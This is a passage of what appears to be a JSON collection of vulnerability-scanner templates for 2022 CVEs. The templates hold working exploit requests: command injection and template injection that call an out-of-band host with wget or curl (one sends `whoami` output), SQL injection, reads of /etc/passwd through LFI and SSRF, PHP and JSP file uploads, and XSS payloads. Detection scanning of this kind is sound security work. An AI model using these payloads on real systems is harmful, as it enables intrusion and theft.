.slug"],"part":"body"},{"type":"regex","group":1,"regex":["uid=.*\\(([a-z]+)\\):"]}]}]},{"id":"CVE-2022-29078","info":{"name":"Node.js Embedded JavaScript 3.1.6 - Template Injection","severity":"critical"},"requests":[{"raw":["GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["You are viewing page number"]}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"<script>alert(document.domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-23944","info":{"name":"Apache ShenYu Admin Unauth Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugin"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"message\":\"query success\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1768","info":{"name":"WordPress RSVPMaker <=9.3.2 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrsvp_id=(select(0)from(select(sleep(5)))a)&amount=1234&email=randomtext\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["\"payment_confirmation_message\":"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1713","info":{"name":"Drawio <18.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /proxy?url=http%3a//0:8080/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Flowchart Maker & Online Diagram Software</title>"]},{"type":"word","part":"header","words":["application/octet-stream"]}]}]},{"id":"CVE-2022-23779","info":{"name":"Zoho ManageEngine - Internal Hostname Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/themes"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/themes/","text/html"],"condition":"and"},{"type":"word","part":"location","negative":true,"words":["{{Host}}"]},{"type":"word","words":["<center><h1>301 Moved Permanently</h1></center>"]},{"type":"regex","part":"location","regex":["https?:\\/\\/(.*):"]},{"type":"status","status":[301]}],"extractors":[{"type":"regex","group":1,"regex":["https?:\\/\\/(.*):"],"part":"location"}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-2733","info":{"name":"Openemr < 7.0.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/interface/login/login.php?site=default\n\nnew_login_session_management=1&languageChoice=1&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /interface/forms/fee_sheet/review/fee_sheet_options_ajax.php?pricelevel=%3Cimg%20src=a%20onerror=alert(document.cookie)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert(document.cookie)>","pricelevel"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0870","info":{"name":"Gogs <0.12.5 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/migrate HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-1952","info":{"name":"WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\nContent-Type: multipart/form-data; boundary=------------------------98efee55508c5059\n\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"action\"\n\neasync_session_store\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"type\"\n\ncar\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"with_driver\"\n\nself-driven\n--------------------------98efee55508c5059\nContent-Disposition: form-data; name=\"driver_license_image2\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5('CVE-2022-1952');?>\n\n--------------------------98efee55508c5059--\n","GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID=a0d5959357e474aef655313f69891f37\n","GET /wp-content/uploads/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_1, 'success\\\":true')","contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')"],"condition":"and"}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["wp-content\\\\\\/uploads\\\\\\/([0-9a-zA-Z]+).php"],"internal":true}]}]},{"id":"CVE-2022-2551","info":{"name":"WordPress Duplicator <1.4.7 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1","{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href='../installer.php'>restart this install process</a>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40879","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=1 onerror=alert(document.domain)>=PQ</p>","\u8be5\u6587\u4ef6\u4e0d"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31299","info":{"name":"Haraj 3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/payform.php?type=upgrade&upgradeid=1&upgradegd=6&price=123&t=1&note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script></textarea>","content=\"nextHaraj"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1054","info":{"name":"WordPress RSVP and Event Management <2.7.8 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RSVP Status","\"First Name\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4306","info":{"name":"WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"panda-repeater-add-new\")"],"condition":"and"}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-0415","info":{"name":"Gogs <0.12.6 - Remote Command Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&description=test&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/upload-file HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Requested-With: XMLHttpRequest\nX-Csrf-Token: {{auth_csrf}}\nContent-Type: multipart/form-data; boundary=---------------------------313811965223810628771946318395\n\n-----------------------------313811965223810628771946318395\nContent-Disposition: form-data; name=\"file\"; filename=\"config\"\nContent-Type: application/octet-stream\n\n[core]\n    repositoryformatversion = 0\n    filemode = true\n    bare = false\n    logallrefupdates = true\n    ignorecase = true\n    precomposeunicode = true\n    sshCommand = curl http://{{interactsh-url}} -I\n[remote \"origin\"]\n    url = git@github.com:torvalds/linux.git\n    fetch = +refs/heads/*:refs/remotes/origin/*\n[branch \"master\"]\n    remote = origin\n    merge = refs/heads/master\n-----------------------------313811965223810628771946318395--\n","POST /{{username}}/{{randstr}}/_upload/master/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&tree_path=/.git/&files={{uuid}}&commit_summary=&commit_message=&commit_choice=direct&new_branch_name=\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"uuid","group":1,"regex":[" \"uuid\": \"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44944","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-44952","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"form_session_token\"\n\n{{nonce}}\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NAME]\"\n\nTest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SHORT_NAME]\"\n\ntest\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_LOGO\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LOGO_URL]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"APP_FAVICON\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FAVICON]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_COPYRIGHT_NAME]\"\n\n<script>alert(document.domain)</script>\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_LANGUAGE]\"\n\nenglish.php\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_SKIN]\"\n\n\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_TIMEZONE]\"\n\nAmerica/New_York\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_ROWS_PER_PAGE]\"\n\n10\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATE_FORMAT]\"\n\nm/d/Y\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_DATETIME_FORMAT]\"\n\nm/d/Y H:i\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_NUMBER_FORMAT]\"\n\n2/./*\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[APP_FIRST_DAY_OF_WEEK]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; name=\"CFG[DROP_DOWN_MENU_ON_HOVER]\"\n\n0\n------WebKitFormBoundaryMh2HSjWbM7zJjWOA\nContent-Disposition: form-data; 